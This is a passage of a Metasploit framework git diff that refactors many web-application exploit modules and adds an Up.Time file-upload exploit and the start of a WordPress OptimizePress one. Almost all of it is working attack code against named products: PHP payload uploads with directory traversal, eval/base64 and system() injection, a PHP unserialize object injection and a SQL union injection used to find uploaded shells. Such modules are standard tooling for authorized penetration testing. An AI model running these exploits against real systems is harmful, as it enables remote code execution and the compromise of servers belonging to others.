redirect = URI(res.headers['Location']).path
else
print_error("#{@peer} - Authentication on SiteScope failed")
print_error("#{peer} - Authentication on SiteScope failed")
return
end
# Follow redirection to complete authentication process
print_status("#{@peer} - Following redirection to finish authentication")
print_status("#{peer} - Following redirection to finish authentication")
res = send_request_cgi(
{
'uri' => redirect,
@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Authentication on SiteScope failed")
print_error("#{peer} - Authentication on SiteScope failed")
return
end
@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
traversal = "..\\..\\..\\..\\..\\..\\"
end
print_status("#{@peer} - Uploading the payload")
print_status("#{peer} - Uploading the payload")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - Payload successfully uploaded to #{path}")
print_good("#{peer} - Payload successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the Payload")
print_error("#{peer} - Error uploading the Payload")
return
end
post_data = Rex::MIME::Message.new
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the JSP")
print_status("#{peer} - Uploading the JSP")
res = send_request_cgi(
{
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - JSP successfully uploaded to #{path}")
print_good("#{peer} - JSP successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the JSP")
print_error("#{peer} - Error uploading the JSP")
return
end

13
modules/exploits/multi/http/kordil_edms_upload_exec.rb
View File

@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname = rand_text_numeric(7)
# upload PHP payload to userpictures/[fname].php
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, php)
if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end

8
modules/exploits/multi/http/mobilecartly_upload_exec.rb
View File

@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
#
# Init target path
#
@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Upload payload
#
print_status("#{@peer} - Uploading payload")
print_status("#{peer} - Uploading payload")
res = send_request_cgi({
'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => {
@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from server, will not continue.")
print_error("#{peer} - No response from server, will not continue.")
return
end
#
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
print_status("#{peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler

6
modules/exploits/multi/http/movabletype_upgrade_exec.rb
View File

@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = rand_text_alpha(5)
print_status("#{@peer} - Sending check...")
print_status("#{peer} - Sending check...")
begin
res = http_send_raw(fingerprint)
rescue Rex::ConnectionError
@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Sending payload...")
print_status("#{peer} - Sending payload...")
http_send_cmd(payload.encoded)
end

24
modules/exploits/multi/http/php_volunteer_upload_exec.rb
View File

@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If we don't get a cookie, bail!
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
cookie = $1
vprint_status("#{@peer} - Found cookie: #{cookie}")
vprint_status("#{peer} - Found cookie: #{cookie}")
else
return nil
end
@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# Login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = login(base, username, password)
if cookie.nil?
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return
end
print_status("#{@peer} - Login successful with #{username}:#{password}")
print_status("#{peer} - Login successful with #{username}:#{password}")
# Take a snapshot of the uploads directory
# Viewing this doesn't actually require the user to login first,
# but we supply the cookie anyway to act more like a real user.
print_status("#{@peer} - Enumerating all the uploads...")
print_status("#{peer} - Enumerating all the uploads...")
before = peek_uploads(base, cookie)
if before.nil?
print_error("#{@peer} - Unable to enumerate original uploads")
print_error("#{peer} - Unable to enumerate original uploads")
return
end
# Upload our PHP shell
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alpha(rand(10)+6) + '.php'
desc = rand_text_alpha(rand(10)+5)
php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, cookie, fname, php, desc)
if res.nil? or res.body !~ /The file was successfuly uploaded/
print_error("#{@peer} - Failed to upload our file")
print_error("#{peer} - Failed to upload our file")
return
end
# Now that we've uploaded our shell, let's take another snapshot
# of the uploads directory.
print_status("#{@peer} - Enumerating new uploads...")
print_status("#{peer} - Enumerating new uploads...")
after = peek_uploads(base, cookie)
if after.nil?
print_error("#{@peer} - Unable to enumerate latest uploads")
print_error("#{peer} - Unable to enumerate latest uploads")
return
end
# Find the filename of our uploaded shell
files = get_my_file(before.body, after.body)
if files.empty?
print_error("#{@peer} - No new file(s) found. The upload probably failed.")
print_error("#{peer} - No new file(s) found. The upload probably failed.")
return
else
vprint_status("#{@peer} - Found these new files: #{files.inspect}")
vprint_status("#{peer} - Found these new files: #{files.inspect}")
end
# There might be more than 1 new file, at least execute the first 10

26
modules/exploits/multi/http/qdpm_upload_exec.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
@clean_files.each do |f|
print_warning("#{@peer} - Removing: #{f}")
print_warning("#{peer} - Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
print_error("#{peer} - Unable to remove #{f}: #{e.message}")
end
end
end
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data
vprint_status("#{@peer} - Enumerating user data")
vprint_status("#{peer} - Enumerating user data")
res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
return {} if not res
if res.code == 404
print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
return {}
end
@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - Unable to request the file")
print_error("#{peer} - Unable to request the file")
return
end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty?
print_error("#{@peer} - Unable to extract the real filename")
print_error("#{peer} - Unable to extract the real filename")
return
end
# Now that we have the filename, request it
print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler
end
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass)
if opts.empty?
print_error("#{@peer} - Login unsuccessful")
print_error("#{peer} - Login unsuccessful")
return
end
@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user,
@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
uploader = upload_php(base, opts)
if not uploader
print_error("#{@peer} - Unable to upload")
print_error("#{peer} - Unable to upload")
return
end
print_status("#{@peer} - Executing '#{php_fname}'")
print_status("#{peer} - Executing '#{php_fname}'")
exec_php(base, opts)
end
end

14
modules/exploits/multi/http/sflog_upload_exec.rb
View File

@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/manage.php",
@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from host")
print_error("#{peer} - No response from host")
return
end
target_path = "#{base}/blogs/download/uploads/#{php_fname}"
print_status("#{@peer} - Requesting '#{target_path}'...")
print_status("#{peer} - Requesting '#{target_path}'...")
res = send_request_raw({'uri'=>target_path})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return
end
@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
cookie = do_login(base)
if cookie.empty?
print_error("#{@peer} - Unable to login")
print_error("#{peer} - Unable to login")
return
end

14
modules/exploits/multi/http/sonicwall_gms_upload.rb
View File

@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
print_status("#{peer} - Retrieving Tomcat installation path...")
if install_path.nil?
fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
print_good("#{peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "java"
exploit_java
@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit_java
print_status("#{@peer} - Uploading WAR file")
print_status("#{peer} - Uploading WAR file")
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s
@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit_native
print_status("#{@peer} - Uploading executable file")
print_status("#{peer} - Uploading executable file")
exe = payload.encoded_exe
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win"

50
modules/exploits/multi/http/testlink_upload_exec.rb
View File

@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
# register an account
user = rand_text_alphanumeric(rand(10)+6)
print_status("#{@peer} - Registering user (#{user})")
print_status("#{peer} - Registering user (#{user})")
res = register(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Registered successfully")
print_status("#{peer} - Registered successfully")
else
print_error("#{@peer} - Registration failed")
print_error("#{peer} - Registration failed")
return
end
# login
print_status("#{@peer} - Authenticating user (#{user})")
print_status("#{peer} - Authenticating user (#{user})")
res = login(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Authenticated successfully")
print_status("#{peer} - Authenticated successfully")
else
print_error("#{@peer} - Authentication failed")
print_error("#{peer} - Authentication failed")
return
end
# set id and table name
id = rand(1000)+1
table = 'nodes_hierarchy'
print_status("#{@peer} - Setting id (#{id}) and table name (#{table})")
print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
begin
res = send_request_cgi({
'method' => 'GET',
@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200
print_status("#{@peer} - Setting id and table name successfully")
print_status("#{peer} - Setting id and table name successfully")
else
print_error("#{@peer} - Setting id and table name failed")
print_error("#{peer} - Setting id and table name failed")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, fname, php)
if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
print_error("#{@peer} - Uploading PHP payload failed")
print_error("#{peer} - Uploading PHP payload failed")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# attempt to retrieve real file name from directory index
print_status("#{@peer} - Retrieving real file name from directory index.")
print_status("#{peer} - Retrieving real file name from directory index.")
begin
res = send_request_cgi({
'method' => 'GET',
@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
print_good("#{peer} - Successfully retrieved file name (#{@token})")
else
print_error("#{@peer} - Could not retrieve file name from directory index.")
print_error("#{peer} - Could not retrieve file name from directory index.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# attempt to retrieve real file name from the database
if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.")
print_status("#{peer} - Retrieving real file name from the database.")
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin
res = send_request_cgi({
@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
print_good("#{peer} - Successfully retrieved file name (#{@token})")
else
print_error("#{@peer} - Could not retrieve file name from the database.")
print_error("#{peer} - Could not retrieve file name from the database.")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{@token}.php)")
print_status("#{peer} - Executing payload (#{@token}.php)")
begin
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end

99
modules/exploits/multi/http/uptime_file_upload.rb Normal file
View File

@ -0,0 +1,99 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end

16
modules/exploits/multi/http/wikka_spam_exec.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
end
cookie
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value
end
else
fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
end
# Add the rest of fields required for login
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
end
return cookie_cred
@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v
end
else
fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
end
# Generate enough URLs to trigger spam logging
@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
@base = normalize_uri(target_uri.path)
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie")
print_status("#{peer} - Getting cookie")
cookie = get_cookie
print_status("#{@peer} - Logging in")
print_status("#{peer} - Logging in")
cred = login(cookie)
print_status("#{@peer} - Triggering spam logging")
print_status("#{peer} - Triggering spam logging")
inject_exec(cred)
handler

4
modules/exploits/unix/webapp/datalife_preview_exec.rb
View File

@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end
end

14
modules/exploits/unix/webapp/hastymail_exec.rb
View File

@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 303
@session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful"
print_good "#{peer} - Authentication successful"
end
end
@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login"
print_status "#{peer} - Trying login"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
print_error "#{peer} - Authentication failed"
return
end
print_status "#{@peer} - Authentication successfully, trying to exploit"
print_status "#{peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed"
print_error "#{peer} - Exploitation failed"
return
end

20
modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def cookie_prefix
print_status("#{@peer} - Checking for cookie prefix")
print_status("#{peer} - Checking for cookie prefix")
cookie_prefix = ""
res = send_request_cgi(
{
@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
print_status("#{@peer} - Cookie prefix #{$1} found")
print_status("#{peer} - Cookie prefix #{$1} found")
cookie_prefix = $1
end
return cookie_prefix
end
def check
@peer = "#{rhost}:#{rport}"
check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
res = send_request_cgi(
{
@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space:
@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end

4
modules/exploits/unix/webapp/kimai_sqli.rb
View File

@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'drone (@dronesec)', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
'drone', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'References' =>
[

10
modules/exploits/unix/webapp/php_charts_exec.rb
View File

@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
rand_key_value = rand_text_alphanumeric(rand(10)+6)
# send payload
print_status("#{@peer} - Sending payload (#{code.length} bytes)")
print_status("#{peer} - Sending payload (#{code.length} bytes)")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
})
if res and res.code == 500
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end

147
modules/exploits/unix/webapp/php_wordpress_optimizepress.rb Normal file
View File

@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
vulnerability is due to an insecure file upload on the media-upload.php component, allowing
an attacker to upload arbitrary PHP code. This module has been tested successfully on
OptimizePress 1.45.
},
'Author' =>
[
'United of Muslim Cyber Army', # Vulnerability discovery
'Mekanismen' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['OptimizePress', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2013'
))
register_advanced_options(
[
OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
])
end
def check
uri = target_uri.path
